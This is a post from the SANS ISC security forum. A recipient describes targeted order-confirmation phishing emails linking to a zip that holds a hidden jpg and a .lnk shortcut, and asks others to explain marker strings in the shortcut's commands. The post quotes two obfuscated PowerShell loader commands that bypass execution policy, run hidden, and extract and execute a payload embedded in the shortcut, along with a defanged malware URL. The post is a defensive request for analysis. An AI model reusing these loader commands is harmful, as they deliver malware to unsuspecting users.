Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: Attempting to report (msg body missing) -- Powershell malware in zip with jpg - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Attempting to report (msg body missing) -- Powershell malware in zip with jpg
All,
hoping this shows up as previous ended up having no msg body in the post.

I have been receiving "targetted" malware emails over the last couple of months (targetted in that they have my companies address and main telephone number correctly listed in the email). Each email is an order confirmation with a hyperlink for the "order details". The link is to a zip file which each time contains a shortcut file which is a powershell cmd and a jpg file which for some reason is always marked as hidden.

In the latest which I have reported a week ago but is still live has a link to :

hXXps://rkbbeauty.com/.cabinet/838IZ46044-package-updated

The jpg is named "image_20180905_190126_22.jpg" and the shortcut "838IZ46044-package-updated.lnk"

The powershell cmd has changed from when I first reported it to:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c "&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;powershell -c $g}}"

which previously was:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no

What I was hoping someone would be able to shed some light on is what is "dikona" or "glirote3".

Thanks in advance
W60

14 Posts

Sign Up for Free or Log In to start participating in the conversation!